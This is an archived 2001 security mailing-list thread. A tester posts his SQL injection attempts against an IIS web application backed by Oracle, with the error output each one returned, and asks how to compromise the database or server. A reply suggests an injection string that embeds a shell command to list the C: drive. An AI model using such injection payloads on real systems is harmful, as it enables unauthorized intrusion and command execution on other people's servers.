Hm ... I would try: Input: „select * from ' & shell („Dir c:\“) & ' sys.tab$“ this will hopefully give you a dir of c:\ Best regards Der Schakal >>>>>>>>>>>>>>>>>> Ursprüngliche Nachricht <<<<<<<<<<<<<<<<<< Am 10.12.2001, 17:06:05, schrieb "foo bar" <badb0tat_private> zum Thema SQL INJECTION - ORACLE: > Hello > I am performing a vulnerability test against a web application and would > like some advice. The application is running IIS 4.0 - all the remote > exploits are patched. The backend is just a bunch of VB scripts, getting > info from an oracle8 server on AIX. > Most of the places where input is accepted must strip out unexpected > characters, but I located one field on a form where input was not properly > validated. I've tried posting different strings into the field with limited > success. All I'm able to get is errors back. I'd like to take advantage of > some stored procedures in oracle. Could you look at the log of my activity > below and provide advice on where to go next in order to compromise the > database, or the server itself? I'd even be happy with the ability to run a > successful query through injection. It looks like their using a package or > stored procedure to post the query, and I'm having trouble breaking out of > it. Is it possible, if so, how should I go about it? > Input: ' > Result: > Microsoft OLE DB Provider for ODBC Drivers error '80040e14' > [Microsoft][ODBC driver for Oracle][Oracle]ORA-00907: missing right > parenthesis > E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128 > Input: ') > Result: > Microsoft OLE DB Provider for ODBC Drivers error '80040e14' > [Microsoft][ODBC driver for Oracle][Oracle]ORA-00923: FROM keyword not found > where expected > E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128 > Input: ') from > Result: > Microsoft OLE DB Provider for ODBC Drivers error '80040e14' > [Microsoft][ODBC driver for Oracle][Oracle]ORA-00903: invalid table name > E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128 > Input: ') from policy > Result: > Microsoft OLE DB Provider for ODBC Drivers error '80040e14' > [Microsoft][ODBC driver for Oracle][Oracle]ORA-00933: SQL command not > properly ended > E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128 > Input: ') from policy -- "'" > Result: > Microsoft OLE DB Provider for ODBC Drivers error '80004005' > [Microsoft][ODBC driver for Oracle][Oracle]ORA-06553: PLS-306: wrong number > or types of arguments in call to 'GETPOLICYNUMBER' > E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128 > Input: ') from getpolicynumber -- "'" > Result: > Microsoft OLE DB Provider for ODBC Drivers error '80004005' > [Microsoft][ODBC driver for Oracle][Oracle]ORA-04044: procedure, function, > package, or type is not allowed here > E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128 > _________________________________________________________________ > Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Mon Dec 10 2001 - 13:11:30 PST